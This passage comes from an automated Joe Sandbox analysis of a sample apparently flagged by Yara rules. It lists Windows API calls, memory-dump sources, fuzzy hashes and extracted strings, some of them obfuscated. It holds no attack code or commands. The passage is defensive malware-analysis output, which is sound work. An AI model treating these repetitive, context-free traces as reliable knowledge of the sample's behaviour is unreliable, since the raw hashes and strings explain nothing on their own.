                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 003A45A2
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00008003,?,?,003A1A50,n;,003B47C7,?), ref: 003A7CB3
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        APIs
                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00399655
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID:
                                                        • API String ID: 2422867632-0
                                                        APIs
                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00399655
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID:
                                                        • API String ID: 2422867632-0
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 003A45A2
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(003A1759,?,003B4F83,003A1759,003B47C7,003B4F83,?,003A1759,003B47C7,00001000,?,?,003B9D20), ref: 003B84AC
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,C8BB3316,00000007,00000000,00000004,00000000,003A3E0E,000000F4,?,?,?,?,?), ref: 003B84FC
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: 2d7a4206cf0a9173fe4b0f884d5e107c5eefc294f47232e3432edd77e42700f4
                                                        • Instruction ID: 4819ca8dcc92f14073e28cf5905d40a774649432954b2505ac38614795419cf4
                                                        • Opcode Fuzzy Hash: 2d7a4206cf0a9173fe4b0f884d5e107c5eefc294f47232e3432edd77e42700f4
                                                        • Instruction Fuzzy Hash: BDE06D726002057BD610EE59DC42FDB33ACEF89714F004019FA09A7242D630B81086B4
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,?,000016A8,?,000004D8,00000000), ref: 003A7E9C
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 2093d433127face845c024bf963096ebcf0e3cfb88e7646a1e5fc4e013b931b1
                                                        • Instruction ID: e0302f2b25d61ec5da15a6bf24e71c37f03ff33b294648b183dbeb5398e2dca7
                                                        • Opcode Fuzzy Hash: 2093d433127face845c024bf963096ebcf0e3cfb88e7646a1e5fc4e013b931b1
                                                        • Instruction Fuzzy Hash: 3BE0867525430427FB246AA8DC87FA63398CB89728F6946A0B91CDB6C3E578FD414150
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 003A45A2
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: f406b443c95aa8b8bc202753eed502b71b197e91b863d455a3e8fec03a0b445f
                                                        • Instruction ID: 9dde428c0d92ec91f69dab72803977bf56025829fd94db7072b146224744fe16
                                                        • Opcode Fuzzy Hash: f406b443c95aa8b8bc202753eed502b71b197e91b863d455a3e8fec03a0b445f
                                                        • Instruction Fuzzy Hash: 79E0D8766A40045FCB10DAD8DC92F69B3A4D745711F444288E51AC7340D9709E99D752
                                                        APIs
                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00399655
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID:
                                                        • API String ID: 2422867632-0
                                                        • Opcode ID: ca5cf424d50c013fcc2e8b286b350509b36337e5946274df91174d223e0f0409
                                                        • Instruction ID: f8a3a37cbc21ac43d39e212fa7d9baa962a1f966e5996eddb4c772b0847469a1
                                                        • Opcode Fuzzy Hash: ca5cf424d50c013fcc2e8b286b350509b36337e5946274df91174d223e0f0409
                                                        • Instruction Fuzzy Hash: 5ED0A73B38430421F521305D1C03FA551484B90B36F26023AFB28E85C0D9D7A843005D
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00008003,?,?,003A1A50,n;,003B47C7,?), ref: 003A7CB3
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 71007cb775d4f21781496c25e8971b57f8605310341acd307ee508b8ec6fc24c
                                                        • Instruction ID: f9ee0101c7b9001876a93431125ae532ce681f351d877f1c53b3646d8221b95d
                                                        • Opcode Fuzzy Hash: 71007cb775d4f21781496c25e8971b57f8605310341acd307ee508b8ec6fc24c
                                                        • Instruction Fuzzy Hash: C6D05E756843053BF641B6B5DC07F57368C8B48798F454064BA0CFB2C3E855F4004175
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b9b7ecc3d3744fbb8435f47a5f4c6d18a51d35259678ca29588f7544e1dfef10
                                                        • Instruction ID: 329db6da8f5ba7679bd58c3f15237dfc4e31eb5ce9f93e2c6c94df5812b9d180
                                                        • Opcode Fuzzy Hash: b9b7ecc3d3744fbb8435f47a5f4c6d18a51d35259678ca29588f7544e1dfef10
                                                        • Instruction Fuzzy Hash: BEB09B719055D5C6DF11E7604A0D717790067D0701F15C061F6034761E4778C5D1F575
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4153372963.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3020000_fc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 47a53ad450088d3469c139e3f0d90be7fb8e262a3935825c81a4b45b28714b48
                                                        • Instruction ID: 407e2ad4917554c18d362bc46c18eb6b3d516775ecc98259f6c232ce7c966b92
                                                        • Opcode Fuzzy Hash: 47a53ad450088d3469c139e3f0d90be7fb8e262a3935825c81a4b45b28714b48
                                                        • Instruction Fuzzy Hash: 6A41297560AB1D4FC368EF68D0816B6F7E6FB85300F50062DD98AC7252EB74E4428784
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9b852aad350d293cb548c66c96eaeacb7aed01e4df245a4c81cae5a05de95eff
                                                        • Instruction ID: 3f501ca3b3911cbbd663b4c327026b9d2c562f9efc7e5a353cc5afa59b89cead
                                                        • Opcode Fuzzy Hash: 9b852aad350d293cb548c66c96eaeacb7aed01e4df245a4c81cae5a05de95eff
                                                        • Instruction Fuzzy Hash: 5FC02B13E109280E60041C4838C20F1E394E0CB177F9433A3C80DF37404403C45D01CD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4153372963.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3020000_fc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                        • API String ID: 0-3754132690
                                                        • Opcode ID: 78b7c0fce2af245d66d1f4bf839006ca4b070487934b7c559596f4784666260f
                                                        • Instruction ID: 2e09b65a4f4f7e86b5f70d99df8e4569f53c0a5a646160c1cc6346f8d1fbb8d5
                                                        • Opcode Fuzzy Hash: 78b7c0fce2af245d66d1f4bf839006ca4b070487934b7c559596f4784666260f
                                                        • Instruction Fuzzy Hash: 149150F04082988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB95
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4153372963.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3020000_fc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ++4$!:hl$*3:v$,.!:$,4)!$/4*:$2Mst$5-4*$:Mst$:Nhs$:TN:$Wu`s$b,.!$u$vv{5$~umi
                                                        • API String ID: 0-1134480191
                                                        • Opcode ID: ff1558ded7d7be7571725462c0b6561cb454f1bbba32aa8beedea54ad6624013
                                                        • Instruction ID: 07c612d745d13f760f4ba3a55052f88423ecd72a1aefc61dbfb8987a7b82b73f
                                                        • Opcode Fuzzy Hash: ff1558ded7d7be7571725462c0b6561cb454f1bbba32aa8beedea54ad6624013
                                                        • Instruction Fuzzy Hash: 801176B0C5070C9ACF069FD5E8856EDBFB0FF05304FA09158D428AF298DB795A428F99
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: 07fb48bd858f1f71ea7e0aed3e3c7de8204fa76814588b2957571dace55271b3
                                                        • Instruction ID: 223837d98825ac3dc86bc7ef244efb8d5b1d93d9ca8d049a366f1dc0b74eaf53
                                                        • Opcode Fuzzy Hash: 07fb48bd858f1f71ea7e0aed3e3c7de8204fa76814588b2957571dace55271b3
                                                        • Instruction Fuzzy Hash: 7451C8B6A00156BFDB10DBA8889497EFBB8BB08305B548269F895D7741E774DE40CBE0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: 9b0d7c3780fff40a84674ba03347b07aa7bc3a87f1e10d075e9199d43ff69a09
                                                        • Instruction ID: a3b66d86175bfd26bf864a15a034aa0ae68f4304f0c68c9bbeca36e15237bd78
                                                        • Opcode Fuzzy Hash: 9b0d7c3780fff40a84674ba03347b07aa7bc3a87f1e10d075e9199d43ff69a09
                                                        • Instruction Fuzzy Hash: 6451E572A00685EADB25DE58C8A49BFB7F9EF48300B44846AE9D7C7741D7B4DE40CB60
                                                        Strings
                                                        • Execute=1, xrefs: 02D74713
                                                        • ExecuteOptions, xrefs: 02D746A0
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02D746FC
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02D74742
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02D74655
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02D74725
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 02D74787
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 0-484625025
                                                        • Opcode ID: b0a9a90b2984c8033a2ad964230e15d6cb30357c38605a3d3d9da5f8784af60c
                                                        • Instruction ID: 8db5aba12800a62571855480ba915673546fc3f5261cf50076761edd91afb401
                                                        • Opcode Fuzzy Hash: b0a9a90b2984c8033a2ad964230e15d6cb30357c38605a3d3d9da5f8784af60c
                                                        • Instruction Fuzzy Hash: 9D51F6B1A406597BFF12ABA4DC95FAEB3B9EF04304F1400A9D505A7390EB709E45CF60
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-$0$0
                                                        • API String ID: 1302938615-699404926
                                                        • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                        • Instruction ID: 60a690e887a9819630a353c87c6074c6dd1075eb31c9e1a5992ca37efef67507
                                                        • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                        • Instruction Fuzzy Hash: 3A817170E052899FDF248F68C451BBEBBA2AF65318F18415BD891AB391CF34DC41CB64
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$[$]:%u
                                                        • API String ID: 48624451-2819853543
                                                        • Opcode ID: 04d2b1b3e2f88e58dd8f5601222c85b658caafd92e96bc3c13a102ab051ca6b7
                                                        • Instruction ID: 02412a95e6e71ca26a3f7ecae7875beb59e02f6581c1c84fe64d62333706ac34
                                                        • Opcode Fuzzy Hash: 04d2b1b3e2f88e58dd8f5601222c85b658caafd92e96bc3c13a102ab051ca6b7
                                                        • Instruction Fuzzy Hash: 9A212176A00119ABDB11DE69D854AEEB7E9EF58784F440126ED46D3300EB309E02CBA1
                                                        Strings
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02D702E7
                                                        • RTL: Re-Waiting, xrefs: 02D7031E
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02D702BD
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                        • API String ID: 0-2474120054
                                                        • Opcode ID: 5046ccfe3b10ffb7f6935af44c4c837dc2ce5164570ca779746f1276009c84a2
                                                        • Instruction ID: 5b529bf183d5de81d0409de610e3cdb936e5c9cdff8e272d003f3a66b9275d14
                                                        • Opcode Fuzzy Hash: 5046ccfe3b10ffb7f6935af44c4c837dc2ce5164570ca779746f1276009c84a2
                                                        • Instruction Fuzzy Hash: B8E19B716087419FD724CF28C884B2AB7F1EB94728F144A69F5A58B7E0E778DC48CB52
                                                        Strings
                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02D77B7F
                                                        • RTL: Re-Waiting, xrefs: 02D77BAC
                                                        • RTL: Resource at %p, xrefs: 02D77B8E
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 0-871070163
                                                        • Opcode ID: e9c315c59059752e6e0b0e5f1c8b2c5d3bff98aefbd7cb8f421187feda2df5c3
                                                        • Instruction ID: 3dde8b13807ba33a1ac3b0c1f781453562c71af2e4bc802c5cd6f0ea1a31e94c
                                                        • Opcode Fuzzy Hash: e9c315c59059752e6e0b0e5f1c8b2c5d3bff98aefbd7cb8f421187feda2df5c3
                                                        • Instruction Fuzzy Hash: 8941B0317047029FD725DE29C840B6AB7E5EB88725F100A2EE99ADB780DB71EC05CF91
                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02D7728C
                                                        Strings
                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02D77294
                                                        • RTL: Re-Waiting, xrefs: 02D772C1
                                                        • RTL: Resource at %p, xrefs: 02D772A3
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-605551621
                                                        • Opcode ID: a3a42d50f025186d996bfd0a55019ca87bf69da04023b1f150f85eb08b7b0260
                                                        • Instruction ID: a862aab1cd262c2b8b43522f1f8ab89f8935a583436b29701c53bde9f699863c
                                                        • Opcode Fuzzy Hash: a3a42d50f025186d996bfd0a55019ca87bf69da04023b1f150f85eb08b7b0260
                                                        • Instruction Fuzzy Hash: E141F432700202ABEB11DE24CC41F66B7A5FF54728F144A19F995DB340EB24EC41CBE1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$]:%u
                                                        • API String ID: 48624451-3050659472
                                                        • Opcode ID: cdcd5ec1395bb6d0bcfbc0fcbb462cd85474be65c356849ff8c82e373a86c64b
                                                        • Instruction ID: 2a07e7cb9a976db1a1d19268d83e56521dc6d79ba26529236e0a931e56be3f99
                                                        • Opcode Fuzzy Hash: cdcd5ec1395bb6d0bcfbc0fcbb462cd85474be65c356849ff8c82e373a86c64b
                                                        • Instruction Fuzzy Hash: 3D316472A00119DFDB61DE28CC54BEE77A8EF44714F84055AAC8AD3300EB309E458F60
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4153372963.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3020000_fc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ,hi$i ,n$j`mx$kve|$~
                                                        • API String ID: 0-3524548386
                                                        • Opcode ID: ab7ec69f4c1aab67319ce5f0cc4f4fa35e43e98db55b9e28669ad05716d61e6f
                                                        • Instruction ID: d5917a95c657bde4cda6ec8468b814202d023085361fa2506daa646c6fc05295
                                                        • Opcode Fuzzy Hash: ab7ec69f4c1aab67319ce5f0cc4f4fa35e43e98db55b9e28669ad05716d61e6f
                                                        • Instruction Fuzzy Hash: 51F09070118B888FD745AF04D408766B7D0FF9930CF90165EE489CB291DB358241CB86
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-
                                                        • API String ID: 1302938615-2137968064
                                                        • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                        • Instruction ID: dd39dfc99c0b1564564bf7091e996ac3fab193773db33a5aa12d975df8cfa5e9
                                                        • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                        • Instruction Fuzzy Hash: C6916E70E002169BEB24DE69C881ABEF7A5EF44764F64472AE855EB3C0DF349D41CB60
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$@
                                                        • API String ID: 0-1194432280
                                                        • Opcode ID: 7760882906057e041b920c864e9720e433bc26b9f560346edcf81836e53fc4ee
                                                        • Instruction ID: 62950db29efc13e414246dd4efe86ec068e63d540b4a94324b013c754615392b
                                                        • Opcode Fuzzy Hash: 7760882906057e041b920c864e9720e433bc26b9f560346edcf81836e53fc4ee
                                                        • Instruction Fuzzy Hash: 25812A71D012699BDB35CB54CC58BEEB7B9AF08714F0041EAAA19B7790D7309E84CFA1